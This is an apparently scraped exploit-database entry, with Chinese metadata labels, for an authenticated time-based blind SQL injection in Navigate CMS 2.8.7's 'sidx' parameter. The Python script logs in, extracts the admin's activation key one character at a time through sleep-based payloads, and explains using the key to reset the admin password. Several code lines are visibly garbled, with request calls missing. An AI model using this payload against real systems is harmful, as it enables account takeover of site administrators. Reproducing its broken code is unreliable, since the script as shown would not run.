Navigate CMS 2.8.7 – ”sidx’ SQL Injection (Authenticated)

  • 作者: Gus Ralph
    日期: 2020-06-04
  • 类别:
  • 来源:
  • # Exploit Title: Navigate CMS 2.8.7 - ''sidx' SQL Injection (Authenticated)
    # Date: 2020-06-04
    # Exploit Author: Gus Ralph
    # Vendor Homepage:
    # Software Link:
    # Version: 2.8.7
    # Tested on: Ubuntu
    # CVE: N/A
    # This script will leak the "activation_key" value for the user who's ID is set to 1 in the database.
    # The activation key can be used to reset that user's password to whatever you want, bypassing the need to crack a hash.
    # An example password reset URL would be: `/login.php?action=password-reset&value=[ACTIVATION CODE LEAKED FROM DB]`
    import requests, time, string
    user = raw_input("Please enter your username: \n")
    password = raw_input("Please enter your password: \n")
    URL = raw_input("Enter the target URL (in this format ''): \n")
    s = requests.Session()
    data = {'login-username': (None, user), 'login-password':(None, password)} = URL + "login.php", files = data)
    dictionary = string.ascii_lowercase + string.ascii_uppercase + string.digits
    final = ""
    while True:
    for x in dictionary:
    payload = '(SELECT (CASE WHEN EXISTS(SELECT password FROM nv_users WHERE activation_key REGEXP BINARY "^' + str(final) + x + '.*" AND id = 1) THEN (SELECT sleep(5)) ELSE date_created END)); -- -'
    r = = URL + "/navigate.php?fid=comments&act=1&rows=1&sidx=" + payload)
    if int(r.elapsed.total_seconds()) > 4:
    final += x
    print "Leaking contents of admin hash: " + final